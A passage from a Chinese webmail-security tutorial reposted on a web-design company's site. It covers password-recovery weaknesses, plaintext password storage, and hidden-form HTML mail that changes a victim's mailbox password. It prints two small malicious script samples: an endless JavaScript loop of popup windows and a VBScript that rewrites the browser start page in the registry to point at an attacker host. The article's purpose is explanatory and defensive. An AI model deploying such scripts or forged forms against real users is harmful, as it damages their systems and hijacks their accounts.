Webmail攻防实战(3)-交流共享-唐山网站建设

Webmail攻防实战(3)

%3Cp%3E

核心提示：在用户正确完成以上各步骤以后，WebMail系统就会让用户恢复自己邮箱帐户的密码。

在用户正确完成以上各步骤以后，WebMail系统就会让用户恢复自己邮箱帐户的密码。密码恢复的方式又各有不同，1般有以下几种方式，安全程度各有不同：

1、页面返回：返回的页面里显示用户的邮箱密码。这样故然方便省事，但是假设让攻击者得到密码，则能在丝尽不惊动用户的情况下使用用户的邮箱，使得攻击者能长时间监视用户的邮箱使用情况，给用户带来更大的安全隐患。

2、邮件发送：将密码发送到用户注册时登记的另1个邮箱里。对攻击者来讲，忙了半天，依然是1无所获，除非继续往攻击另1个邮箱；对用户来讲，在另1个邮箱里收到发来的密码则是1个正告，说明有攻击者猜想到了他的邮箱密码提示题目，迫使用户尽快改变自己的密码提示题目。

不过，假设用户注册时登记的不是1个正确的邮箱，或该邮箱已失效，那末，这样不但是攻击者，就是用户本人也永久得不到密码了。有些WebMail系统在注册时要求用户登记正确的邮件地址，并把邮箱开通的验证信息发往该邮件地址，不过这样依然不能避免用户在邮箱失效后不能恢复自己邮箱密码的情况产生。

3、密码重设：让用户重新设置1个密码。这类方式相比“页面返回”方式，在攻击者重设密码后，用户由于不能正常登录进自己的邮箱而能发觉出遭到攻击，安全性相对好1些；但是相比“邮件发送”方式，由于攻击者能立即修改邮箱密码，少了1层保障，安全性又差1些。

由“页面返回”或“邮件发送”回来的密码可以明显看出，该电子邮件系统是把邮箱帐户的密码未经加密直接以明文保存在数据库或LDAP服务器中。这样就造成很大的安全隐患，WebMail系统治理员或侵进数据库的攻击者能轻易获得用户的邮箱密码，用户却完全不知情，所以为了加大保密性，有必要将邮箱密码加密后再以密文存进数据库，最好用不可逆的单向加密算法，如md5等。

邮箱密码恢复机制是否是安全，主要还是看WebMail系统提出甚么样的题目、采取甚么样的问答方式，例如将多个密码恢复步骤中提出的题目放在1步中1起提出，就会相应地增加攻击者的难度从而进步安全性，像搜狐邮件、新浪邮件和yahoo电邮等都是1些使人失看的例子。

4、恶性HTML邮件

电子邮件有两种格式：纯文本（txt）和超文本（html）。Html邮件由html语言写成，当通过支持html的邮件客户端或以浏览器登录进进WebMail查看时，有字体、色采、链接、图象、声音等等，给人以深入的印象，很多垃圾广告就是以html邮件格式发送的。

利用html邮件，攻击者能进行电子邮件欺骗，乃至欺骗用户更改自己的邮箱密码。例如攻击者通过分析WebMail密码修改页面的各表单元素，设计1个隐含有一样表单的html页面，预先给“新密码”表单元素赋值，然后以html邮件发送给用户，欺骗用户说在页面中提交某个表单或点击某个链接便可以打开1个出色网页，用户照做后，在打开“出色网页”的同时，1个修改邮箱密码的表单要求已发向WebMail系统，而这1切，用户完全不知情，直到下次不能登录进自己邮箱的时候。

为了避免此类的html邮件欺骗，在修改邮箱配置时，特别是修改邮箱密码和提示题目时，WebMail系统有必要让用户输进旧密码加以确认，这样也能有效避免载取到当前WebMail会话的攻击者（下面会先容）更改邮箱密码。

通过在html邮件中嵌进恶性脚本程序，攻击者还能进行很多破坏攻击，如修改注册表、非法操纵文件、格式化硬盘、耗尽系统资源、修改“开始”菜单等，乃至能删除和发送用户的邮件、访问用户的地址簿、修改邮箱帐户密码等等。恶性脚本程序1般由JavaScript或VBScript脚本语言写成，内嵌在html语言中，通过调用ActiveX控件或结合WSH来到达破坏攻击目的。深受修改浏览器的恶性html页面之痛，饱经“欢乐时光”邮件病毒之苦的朋友，对此应当不会陌生。下面是两个简单的恶性脚本程序：

1、打开无数个浏览器窗口，直至CPU超负荷，非关机不可：
　　

以下为援用的内容：
　　＜scriptlanguage="JavaScript"＞
　　
　　＜!--
　　while(true)
　　{
　　window.open("URI")；//假设URI就是当前页本身，那就更具破坏性。
　　}
　　//--＞
　　
　　＜/script＞

　　
2、修改注册表：
　

以下为援用的内容：
　　＜scriptlanguage="VBScript"＞
　　SetRegWsh=CreateObject("WScript.Shell")
　　'设置IE浏览器默许页
　　RegWsh.RegWrite"HKCU\Software\Microsoft\InternetExplorer\Main\StartPage","http://ww-w.attacker.com"
　　＜/script＞

唐山网站建设www.fw8.net%3C%2Fp%3E
TAG:用户,密码,攻击者,邮箱,邮件

评论加载中...